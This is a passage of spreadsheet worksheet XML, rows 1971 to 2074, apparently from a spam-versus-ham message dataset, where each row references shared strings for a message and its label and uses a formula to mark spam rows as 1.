    <row r="1971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1971" t="s">
        <v>7196</v>
      </c>
      <c r="B1971" t="s">
        <v>5297</v>
      </c>
      <c r="C1971" s="1">
        <f>IF(B1971="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1972" t="s">
        <v>7197</v>
      </c>
      <c r="B1972" t="s">
        <v>5294</v>
      </c>
      <c r="C1972" s="1">
        <f>IF(B1972="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1973" t="s">
        <v>7198</v>
      </c>
      <c r="B1973" t="s">
        <v>5294</v>
      </c>
      <c r="C1973" s="1">
        <f>IF(B1973="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1974" t="s">
        <v>7199</v>
      </c>
      <c r="B1974" t="s">
        <v>5294</v>
      </c>
      <c r="C1974" s="1">
        <f>IF(B1974="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1975" t="s">
        <v>5926</v>
      </c>
      <c r="B1975" t="s">
        <v>5294</v>
      </c>
      <c r="C1975" s="1">
        <f>IF(B1975="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1976" t="s">
        <v>7200</v>
      </c>
      <c r="B1976" t="s">
        <v>5294</v>
      </c>
      <c r="C1976" s="1">
        <f>IF(B1976="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1977" t="s">
        <v>7201</v>
      </c>
      <c r="B1977" t="s">
        <v>5294</v>
      </c>
      <c r="C1977" s="1">
        <f>IF(B1977="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1978" t="s">
        <v>7202</v>
      </c>
      <c r="B1978" t="s">
        <v>5294</v>
      </c>
      <c r="C1978" s="1">
        <f>IF(B1978="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1979" t="s">
        <v>7203</v>
      </c>
      <c r="B1979" t="s">
        <v>5297</v>
      </c>
      <c r="C1979" s="1">
        <f>IF(B1979="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1980" t="s">
        <v>7204</v>
      </c>
      <c r="B1980" t="s">
        <v>5294</v>
      </c>
      <c r="C1980" s="1">
        <f>IF(B1980="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1981" t="s">
        <v>7205</v>
      </c>
      <c r="B1981" t="s">
        <v>5294</v>
      </c>
      <c r="C1981" s="1">
        <f>IF(B1981="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1982" t="s">
        <v>5376</v>
      </c>
      <c r="B1982" t="s">
        <v>5294</v>
      </c>
      <c r="C1982" s="1">
        <f>IF(B1982="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1983" t="s">
        <v>7206</v>
      </c>
      <c r="B1983" t="s">
        <v>5294</v>
      </c>
      <c r="C1983" s="1">
        <f>IF(B1983="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1984" t="s">
        <v>7207</v>
      </c>
      <c r="B1984" t="s">
        <v>5294</v>
      </c>
      <c r="C1984" s="1">
        <f>IF(B1984="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1985" t="s">
        <v>5718</v>
      </c>
      <c r="B1985" t="s">
        <v>5294</v>
      </c>
      <c r="C1985" s="1">
        <f>IF(B1985="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1986" t="s">
        <v>7208</v>
      </c>
      <c r="B1986" t="s">
        <v>5297</v>
      </c>
      <c r="C1986" s="1">
        <f>IF(B1986="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1987" t="s">
        <v>7209</v>
      </c>
      <c r="B1987" t="s">
        <v>5294</v>
      </c>
      <c r="C1987" s="1">
        <f>IF(B1987="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1988" t="s">
        <v>7210</v>
      </c>
      <c r="B1988" t="s">
        <v>5294</v>
      </c>
      <c r="C1988" s="1">
        <f>IF(B1988="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1989" t="s">
        <v>5341</v>
      </c>
      <c r="B1989" t="s">
        <v>5294</v>
      </c>
      <c r="C1989" s="1">
        <f>IF(B1989="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1990" t="s">
        <v>5376</v>
      </c>
      <c r="B1990" t="s">
        <v>5294</v>
      </c>
      <c r="C1990" s="1">
        <f>IF(B1990="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1991" t="s">
        <v>7211</v>
      </c>
      <c r="B1991" t="s">
        <v>5294</v>
      </c>
      <c r="C1991" s="1">
        <f>IF(B1991="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1992" t="s">
        <v>7212</v>
      </c>
      <c r="B1992" t="s">
        <v>5294</v>
      </c>
      <c r="C1992" s="1">
        <f>IF(B1992="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1993" t="s">
        <v>7213</v>
      </c>
      <c r="B1993" t="s">
        <v>5294</v>
      </c>
      <c r="C1993" s="1">
        <f>IF(B1993="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1994" t="s">
        <v>7214</v>
      </c>
      <c r="B1994" t="s">
        <v>5297</v>
      </c>
      <c r="C1994" s="1">
        <f>IF(B1994="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1995" t="s">
        <v>7215</v>
      </c>
      <c r="B1995" t="s">
        <v>5294</v>
      </c>
      <c r="C1995" s="1">
        <f>IF(B1995="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1996" t="s">
        <v>7216</v>
      </c>
      <c r="B1996" t="s">
        <v>5294</v>
      </c>
      <c r="C1996" s="1">
        <f>IF(B1996="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1997" t="s">
        <v>5809</v>
      </c>
      <c r="B1997" t="s">
        <v>5294</v>
      </c>
      <c r="C1997" s="1">
        <f>IF(B1997="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1998" t="s">
        <v>7217</v>
      </c>
      <c r="B1998" t="s">
        <v>5294</v>
      </c>
      <c r="C1998" s="1">
        <f>IF(B1998="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1999" t="s">
        <v>7218</v>
      </c>
      <c r="B1999" t="s">
        <v>5294</v>
      </c>
      <c r="C1999" s="1">
        <f>IF(B1999="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2000" t="s">
        <v>7219</v>
      </c>
      <c r="B2000" t="s">
        <v>5294</v>
      </c>
      <c r="C2000" s="1">
        <f>IF(B2000="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2001" t="s">
        <v>7220</v>
      </c>
      <c r="B2001" t="s">
        <v>5294</v>
      </c>
      <c r="C2001" s="1">
        <f>IF(B2001="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2002" t="s">
        <v>7221</v>
      </c>
      <c r="B2002" t="s">
        <v>5294</v>
      </c>
      <c r="C2002" s="1">
        <f>IF(B2002="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2003" t="s">
        <v>7222</v>
      </c>
      <c r="B2003" t="s">
        <v>5294</v>
      </c>
      <c r="C2003" s="1">
        <f>IF(B2003="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2004" t="s">
        <v>7223</v>
      </c>
      <c r="B2004" t="s">
        <v>5297</v>
      </c>
      <c r="C2004" s="1">
        <f>IF(B2004="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2005" t="s">
        <v>7224</v>
      </c>
      <c r="B2005" t="s">
        <v>5294</v>
      </c>
      <c r="C2005" s="1">
        <f>IF(B2005="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2006" t="s">
        <v>7225</v>
      </c>
      <c r="B2006" t="s">
        <v>5294</v>
      </c>
      <c r="C2006" s="1">
        <f>IF(B2006="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2007" t="s">
        <v>7226</v>
      </c>
      <c r="B2007" t="s">
        <v>5294</v>
      </c>
      <c r="C2007" s="1">
        <f>IF(B2007="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2008" t="s">
        <v>7227</v>
      </c>
      <c r="B2008" t="s">
        <v>5294</v>
      </c>
      <c r="C2008" s="1">
        <f>IF(B2008="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2009" t="s">
        <v>7228</v>
      </c>
      <c r="B2009" t="s">
        <v>5294</v>
      </c>
      <c r="C2009" s="1">
        <f>IF(B2009="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2010" t="s">
        <v>7229</v>
      </c>
      <c r="B2010" t="s">
        <v>5294</v>
      </c>
      <c r="C2010" s="1">
        <f>IF(B2010="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2011" t="s">
        <v>7230</v>
      </c>
      <c r="B2011" t="s">
        <v>5294</v>
      </c>
      <c r="C2011" s="1">
        <f>IF(B2011="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2012" t="s">
        <v>7231</v>
      </c>
      <c r="B2012" t="s">
        <v>5294</v>
      </c>
      <c r="C2012" s="1">
        <f>IF(B2012="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2013" t="s">
        <v>7232</v>
      </c>
      <c r="B2013" t="s">
        <v>5294</v>
      </c>
      <c r="C2013" s="1">
        <f>IF(B2013="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2014" t="s">
        <v>7233</v>
      </c>
      <c r="B2014" t="s">
        <v>5294</v>
      </c>
      <c r="C2014" s="1">
        <f>IF(B2014="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2015" t="s">
        <v>7234</v>
      </c>
      <c r="B2015" t="s">
        <v>5297</v>
      </c>
      <c r="C2015" s="1">
        <f>IF(B2015="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2016" t="s">
        <v>7235</v>
      </c>
      <c r="B2016" t="s">
        <v>5294</v>
      </c>
      <c r="C2016" s="1">
        <f>IF(B2016="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2017" t="s">
        <v>7236</v>
      </c>
      <c r="B2017" t="s">
        <v>5294</v>
      </c>
      <c r="C2017" s="1">
        <f>IF(B2017="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2018" t="s">
        <v>7237</v>
      </c>
      <c r="B2018" t="s">
        <v>5294</v>
      </c>
      <c r="C2018" s="1">
        <f>IF(B2018="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2019" t="s">
        <v>7238</v>
      </c>
      <c r="B2019" t="s">
        <v>5294</v>
      </c>
      <c r="C2019" s="1">
        <f>IF(B2019="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2020" t="s">
        <v>7239</v>
      </c>
      <c r="B2020" t="s">
        <v>5294</v>
      </c>
      <c r="C2020" s="1">
        <f>IF(B2020="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2021" t="s">
        <v>7240</v>
      </c>
      <c r="B2021" t="s">
        <v>5294</v>
      </c>
      <c r="C2021" s="1">
        <f>IF(B2021="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2022" t="s">
        <v>7241</v>
      </c>
      <c r="B2022" t="s">
        <v>5294</v>
      </c>
      <c r="C2022" s="1">
        <f>IF(B2022="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2023" t="s">
        <v>7242</v>
      </c>
      <c r="B2023" t="s">
        <v>5294</v>
      </c>
      <c r="C2023" s="1">
        <f>IF(B2023="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2024" t="s">
        <v>7243</v>
      </c>
      <c r="B2024" t="s">
        <v>5297</v>
      </c>
      <c r="C2024" s="1">
        <f>IF(B2024="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2025" t="s">
        <v>7244</v>
      </c>
      <c r="B2025" t="s">
        <v>5294</v>
      </c>
      <c r="C2025" s="1">
        <f>IF(B2025="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2026" t="s">
        <v>7245</v>
      </c>
      <c r="B2026" t="s">
        <v>5294</v>
      </c>
      <c r="C2026" s="1">
        <f>IF(B2026="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2027" t="s">
        <v>7246</v>
      </c>
      <c r="B2027" t="s">
        <v>5294</v>
      </c>
      <c r="C2027" s="1">
        <f>IF(B2027="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2028" t="s">
        <v>7247</v>
      </c>
      <c r="B2028" t="s">
        <v>5294</v>
      </c>
      <c r="C2028" s="1">
        <f>IF(B2028="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2029" t="s">
        <v>7248</v>
      </c>
      <c r="B2029" t="s">
        <v>5294</v>
      </c>
      <c r="C2029" s="1">
        <f>IF(B2029="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2030" t="s">
        <v>7249</v>
      </c>
      <c r="B2030" t="s">
        <v>5294</v>
      </c>
      <c r="C2030" s="1">
        <f>IF(B2030="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2031" t="s">
        <v>7250</v>
      </c>
      <c r="B2031" t="s">
        <v>5294</v>
      </c>
      <c r="C2031" s="1">
        <f>IF(B2031="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2032" t="s">
        <v>7251</v>
      </c>
      <c r="B2032" t="s">
        <v>5294</v>
      </c>
      <c r="C2032" s="1">
        <f>IF(B2032="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2033" t="s">
        <v>7252</v>
      </c>
      <c r="B2033" t="s">
        <v>5294</v>
      </c>
      <c r="C2033" s="1">
        <f>IF(B2033="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2034" t="s">
        <v>7253</v>
      </c>
      <c r="B2034" t="s">
        <v>5294</v>
      </c>
      <c r="C2034" s="1">
        <f>IF(B2034="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2035" t="s">
        <v>7254</v>
      </c>
      <c r="B2035" t="s">
        <v>5294</v>
      </c>
      <c r="C2035" s="1">
        <f>IF(B2035="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2036" t="s">
        <v>7255</v>
      </c>
      <c r="B2036" t="s">
        <v>5294</v>
      </c>
      <c r="C2036" s="1">
        <f>IF(B2036="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2037" t="s">
        <v>7256</v>
      </c>
      <c r="B2037" t="s">
        <v>5294</v>
      </c>
      <c r="C2037" s="1">
        <f>IF(B2037="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2038" t="s">
        <v>7257</v>
      </c>
      <c r="B2038" t="s">
        <v>5294</v>
      </c>
      <c r="C2038" s="1">
        <f>IF(B2038="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2039" t="s">
        <v>7258</v>
      </c>
      <c r="B2039" t="s">
        <v>5294</v>
      </c>
      <c r="C2039" s="1">
        <f>IF(B2039="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2040" t="s">
        <v>7259</v>
      </c>
      <c r="B2040" t="s">
        <v>5294</v>
      </c>
      <c r="C2040" s="1">
        <f>IF(B2040="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2041" t="s">
        <v>7260</v>
      </c>
      <c r="B2041" t="s">
        <v>5294</v>
      </c>
      <c r="C2041" s="1">
        <f>IF(B2041="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2042" t="s">
        <v>7261</v>
      </c>
      <c r="B2042" t="s">
        <v>5294</v>
      </c>
      <c r="C2042" s="1">
        <f>IF(B2042="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2043" t="s">
        <v>7262</v>
      </c>
      <c r="B2043" t="s">
        <v>5294</v>
      </c>
      <c r="C2043" s="1">
        <f>IF(B2043="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2044" t="s">
        <v>7263</v>
      </c>
      <c r="B2044" t="s">
        <v>5294</v>
      </c>
      <c r="C2044" s="1">
        <f>IF(B2044="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2045" t="s">
        <v>5677</v>
      </c>
      <c r="B2045" t="s">
        <v>5297</v>
      </c>
      <c r="C2045" s="1">
        <f>IF(B2045="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2046" t="s">
        <v>7264</v>
      </c>
      <c r="B2046" t="s">
        <v>5294</v>
      </c>
      <c r="C2046" s="1">
        <f>IF(B2046="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2047" t="s">
        <v>7265</v>
      </c>
      <c r="B2047" t="s">
        <v>5294</v>
      </c>
      <c r="C2047" s="1">
        <f>IF(B2047="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2048" t="s">
        <v>7266</v>
      </c>
      <c r="B2048" t="s">
        <v>5294</v>
      </c>
      <c r="C2048" s="1">
        <f>IF(B2048="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2049" t="s">
        <v>7267</v>
      </c>
      <c r="B2049" t="s">
        <v>5294</v>
      </c>
      <c r="C2049" s="1">
        <f>IF(B2049="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2050" t="s">
        <v>7268</v>
      </c>
      <c r="B2050" t="s">
        <v>5294</v>
      </c>
      <c r="C2050" s="1">
        <f>IF(B2050="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2051" t="s">
        <v>7269</v>
      </c>
      <c r="B2051" t="s">
        <v>5294</v>
      </c>
      <c r="C2051" s="1">
        <f>IF(B2051="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2052" t="s">
        <v>7270</v>
      </c>
      <c r="B2052" t="s">
        <v>5294</v>
      </c>
      <c r="C2052" s="1">
        <f>IF(B2052="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2053" t="s">
        <v>7271</v>
      </c>
      <c r="B2053" t="s">
        <v>5294</v>
      </c>
      <c r="C2053" s="1">
        <f>IF(B2053="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2054" t="s">
        <v>7272</v>
      </c>
      <c r="B2054" t="s">
        <v>5297</v>
      </c>
      <c r="C2054" s="1">
        <f>IF(B2054="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2055" t="s">
        <v>7273</v>
      </c>
      <c r="B2055" t="s">
        <v>5294</v>
      </c>
      <c r="C2055" s="1">
        <f>IF(B2055="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2056" t="s">
        <v>7274</v>
      </c>
      <c r="B2056" t="s">
        <v>5294</v>
      </c>
      <c r="C2056" s="1">
        <f>IF(B2056="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2057" t="s">
        <v>7275</v>
      </c>
      <c r="B2057" t="s">
        <v>5294</v>
      </c>
      <c r="C2057" s="1">
        <f>IF(B2057="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2058" t="s">
        <v>7276</v>
      </c>
      <c r="B2058" t="s">
        <v>5294</v>
      </c>
      <c r="C2058" s="1">
        <f>IF(B2058="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2059" t="s">
        <v>7277</v>
      </c>
      <c r="B2059" t="s">
        <v>5294</v>
      </c>
      <c r="C2059" s="1">
        <f>IF(B2059="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2060" t="s">
        <v>7278</v>
      </c>
      <c r="B2060" t="s">
        <v>5294</v>
      </c>
      <c r="C2060" s="1">
        <f>IF(B2060="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2061" t="s">
        <v>7279</v>
      </c>
      <c r="B2061" t="s">
        <v>5294</v>
      </c>
      <c r="C2061" s="1">
        <f>IF(B2061="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2062" t="s">
        <v>7280</v>
      </c>
      <c r="B2062" t="s">
        <v>5294</v>
      </c>
      <c r="C2062" s="1">
        <f>IF(B2062="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2063" t="s">
        <v>7281</v>
      </c>
      <c r="B2063" t="s">
        <v>5294</v>
      </c>
      <c r="C2063" s="1">
        <f>IF(B2063="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2064" t="s">
        <v>7282</v>
      </c>
      <c r="B2064" t="s">
        <v>5294</v>
      </c>
      <c r="C2064" s="1">
        <f>IF(B2064="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2065" t="s">
        <v>7283</v>
      </c>
      <c r="B2065" t="s">
        <v>5297</v>
      </c>
      <c r="C2065" s="1">
        <f>IF(B2065="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2066" t="s">
        <v>7284</v>
      </c>
      <c r="B2066" t="s">
        <v>5294</v>
      </c>
      <c r="C2066" s="1">
        <f>IF(B2066="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2067" t="s">
        <v>7285</v>
      </c>
      <c r="B2067" t="s">
        <v>5294</v>
      </c>
      <c r="C2067" s="1">
        <f>IF(B2067="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2068" t="s">
        <v>7286</v>
      </c>
      <c r="B2068" t="s">
        <v>5294</v>
      </c>
      <c r="C2068" s="1">
        <f>IF(B2068="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2069" t="s">
        <v>7287</v>
      </c>
      <c r="B2069" t="s">
        <v>5294</v>
      </c>
      <c r="C2069" s="1">
        <f>IF(B2069="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2070" t="s">
        <v>7288</v>
      </c>
      <c r="B2070" t="s">
        <v>5294</v>
      </c>
      <c r="C2070" s="1">
        <f>IF(B2070="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2071" t="s">
        <v>7289</v>
      </c>
      <c r="B2071" t="s">
        <v>5297</v>
      </c>
      <c r="C2071" s="1">
        <f>IF(B2071="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2072" t="s">
        <v>7290</v>
      </c>
      <c r="B2072" t="s">
        <v>5297</v>
      </c>
      <c r="C2072" s="1">
        <f>IF(B2072="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2073" t="s">
        <v>7291</v>
      </c>
      <c r="B2073" t="s">
        <v>5294</v>
      </c>
      <c r="C2073" s="1">
        <f>IF(B2073="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2074" t="s">
        <v>7292</v>
      </c>
      <c r="B2074" t="s">
        <v>5294</v>
      </c>
      <c r="C2074" s="1">
        <f>IF(B2074="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
